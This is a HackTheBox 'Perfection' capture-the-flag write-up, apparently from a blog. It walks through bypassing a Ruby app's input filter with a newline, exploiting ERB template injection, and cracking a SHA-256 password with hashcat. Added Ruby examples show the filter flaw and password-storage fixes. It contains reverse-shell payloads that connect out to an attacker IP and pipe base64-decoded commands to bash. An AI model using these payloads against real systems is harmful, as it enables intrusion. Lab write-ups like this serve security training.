
HTB - Perfection

Box Info

Name: Perfection
Release Date: 02 Mar, 2024
OS: Linux
Rated Difficulty: Easy

Enumeration

nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.253 -oG allPorts
nmap -sCV -p 22,80 10.10.11.253 -oN targeted


DNS resolution

echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts

Technology

whatweb http://perfection.htb


Web


The site is served by WEBrick version 1.7.0. WEBrick is a Ruby library that provides a simple HTTP server, so the application behind it is most likely written in Ruby.


If you intercept the request you can see a parameter like category1=literature. If you change it to category1=$ you are redirected to a page with the text “Malicious text blocked”, so there is some server-side input validation.

We can use ffuf to enumerate which characters the filter blocks.

ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=FUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious

But what happens if we URL-encode the input and put a newline in front of the fuzzed characters?

ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=poop%0aFUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious

%0a is the URL-encoded newline character; placing it after a valid value is what bypasses the input validation, because the check only looks at the first line.
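The reason a newline gets past the filter, as an added illustration that is not code from the writeup or the box, is a Ruby regex detail: in Ruby, ^ and $ are line anchors, not string anchors. The WEAK_PATTERN, the render functions and the input values below are assumptions written to demonstrate the failure mode and its fix (\A and \z anchors, and never concatenating user input into ERB template source); they are not the application's real code.

```ruby
require 'cgi'
require 'erb'

# Hypothetical validator in the style of the filter we hit: ^ and $ match at
# line boundaries in Ruby, so only the first line has to satisfy the pattern.
WEAK_PATTERN = /^[a-zA-Z0-9\s]+$/

# Hardened validator: \A and \z anchor to the whole string, and a literal
# space replaces \s (which would still accept a newline).
STRICT_PATTERN = /\A[a-zA-Z0-9 ]+\z/

# Decode a raw form value the way the server sees it ("+" -> space, %0a -> "\n").
def decode_param(raw)
  CGI.unescape(raw)
end

def weak_allowed?(value)
  value.match?(WEAK_PATTERN)
end

def strict_allowed?(value)
  value.match?(STRICT_PATTERN)
end

# Vulnerable rendering: user input becomes part of the template source, so any
# <%= ... %> inside the value is evaluated by ERB (server-side template injection).
def render_vulnerable(category)
  ERB.new("<p>Category: #{category}</p>").result
end

# Safe rendering: the template is fixed and the value is passed in as data and
# HTML-escaped, so template syntax in the input is printed, never evaluated.
SAFE_TEMPLATE = ERB.new("<p>Category: <%= ERB::Util.html_escape(category) %></p>")

def render_safe(category)
  SAFE_TEMPLATE.result_with_hash(category: category)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed request value: a valid first line, then a harmless template expression.
  value = decode_param("poop%0a%3C%25%3D+7*7+%25%3E")
  puts "weak filter allows:   #{weak_allowed?(value)}"
  puts "strict filter allows: #{strict_allowed?(value)}"
  puts "vulnerable render:    #{render_vulnerable(value)}"
  puts "safe render:          #{render_safe(value)}"
end
```

Run it as a script and the weak check accepts the two-line value while the strict check rejects it; the vulnerable renderer evaluates the expression, the safe renderer prints it escaped.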

The first thing that comes to mind is an SSTI. Let's look in PayloadsAllTheThings to see whether there is something for Ruby.

PayloadsAllTheThings - Ruby


hURL is used to encode and decode the payload. The payload crafted for the Weighted Grade Calculator application executes a reverse shell command, taking advantage of the server-side code execution.

hURL -B "bash -i >& /dev/tcp/10.10.14.78/7777 0>&1"   (base64)
hURL -U "{_stringbase64_}"                            (URL encoded)


Payload

category1=poop%0a<%25=system("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40OC83Nzc3IDA%2BJjE%3D|+base64+-d+|+bash");%25>1


Alternatively, use the payload <%= IO.popen('id').readlines() %>, URL-encoded.


HackTricks - SSTI

<%= IO.popen('bash -i >& /dev/tcp/10.10.14.78/7777 0>&1').readlines() %>


Enumerating the box, we found a .db file and got the credentials from it.

strings prints every sequence of 4 or more printable characters, so running it against the .db file is enough to expose its contents.


Privilege Escalation


Hashcat

hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d"



susan_nasus_413759210
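Hashcat mode 1400 is raw, unsalted SHA-256: one fast digest per guess and identical output for identical passwords, which is why a known prefix plus a digit mask is enough to recover it. The following is an added example, not code from the writeup or the box, showing that weakness beside the storage scheme that defends against it (random salt plus PBKDF2-HMAC-SHA256 from Ruby's OpenSSL stdlib). The password value, the record format and the function names are assumptions made for the demonstration.

```ruby
require 'digest'
require 'openssl'
require 'securerandom'

# What hashcat -m 1400 attacks: a bare SHA-256 of the password. No salt, so the
# same password always yields the same digest and every guess costs one cheap hash.
def raw_sha256(password)
  Digest::SHA256.hexdigest(password)
end

# Hardened storage: per-user random salt and a deliberately slow KDF.
# Record format (assumed for this example): pbkdf2_sha256$<iterations>$<salt>$<hex>
DEFAULT_ITERATIONS = 600_000

def store_password(password, iterations: DEFAULT_ITERATIONS, salt: SecureRandom.hex(16))
  dk = OpenSSL::KDF.pbkdf2_hmac(password, salt: salt, iterations: iterations,
                                length: 32, hash: 'sha256')
  "pbkdf2_sha256$#{iterations}$#{salt}$#{dk.unpack1('H*')}"
end

# Constant-time comparison so verification time does not leak how many leading
# characters of the digest matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verify_password(record, candidate)
  scheme, iterations, salt, hex = record.split('$')
  return false unless scheme == 'pbkdf2_sha256' && salt && hex
  dk = OpenSSL::KDF.pbkdf2_hmac(candidate, salt: salt, iterations: iterations.to_i,
                                length: 32, hash: 'sha256')
  secure_equal?(dk.unpack1('H*'), hex)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed password following the same "name + digits" shape seen on the box.
  pw = 'example_user_000000000'
  puts "raw sha256 (identical every time): #{raw_sha256(pw)}"
  puts "pbkdf2 record #1: #{store_password(pw)}"
  puts "pbkdf2 record #2: #{store_password(pw)}"   # different salt, different hash
end
```

A mask of nine digits is only a billion candidates; against raw SHA-256 that is seconds of GPU time, against PBKDF2 with a random salt each guess costs hundreds of thousands of hash operations and precomputation across users is useless.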


Root

This post is licensed under CC BY 4.0 by the author.